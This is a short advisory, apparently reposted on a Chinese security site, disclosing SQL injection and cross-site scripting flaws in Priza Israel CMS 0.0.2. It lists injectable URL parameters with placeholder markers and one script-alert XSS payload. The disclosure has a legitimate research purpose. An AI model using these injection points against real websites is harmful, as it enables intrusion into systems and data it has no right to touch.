标题: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability 作者: BHG Security Center www.2cto.com 软件地址: http://www.priza.co.il/ 影响版本: [0.0.2] 测试平台: ubuntu 11.04 发现者: - Net.Edit0r (Net.edit0r [at] att [dot] net) - G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com) ----------------------------------------------------------------------------------------- Priza Israel Cms SQL Injection / XSS Multiple Vulnerability ----------------------------------------------------------------------------------------- Author : BHG Security Center --------------------------------------------------------------------------- PoC/Exploit: ~~~~~~~~~~ ~ [PoC] ~: /website_path/index. asp ?p_id=201&id=[SQLi] ~ [PoC] ~: /website_path/index.asp?page_id=[SQLi] ~ [PoC] ~: /website_path/volumes.asp?id=18 ~ [PoC] ~: /website_path/index.asp?action=find&page_id=28&string=[Xss] ~~~~~~~~ 测试 ~ [PoC] ~: Http://www.2cto.com /path/index.asp?p_id=201&id=[SQLi] ~ [PoC] ~: Http://www.2cto.com /path/index.asp?action=find&page_id=28&string="><script>alert(0)</script> -------------------------------- [ EOF ] ----------------------------------
查看更多关于Priza CMS多个缺陷及修复 - 网站安全 - 自学php的详细内容...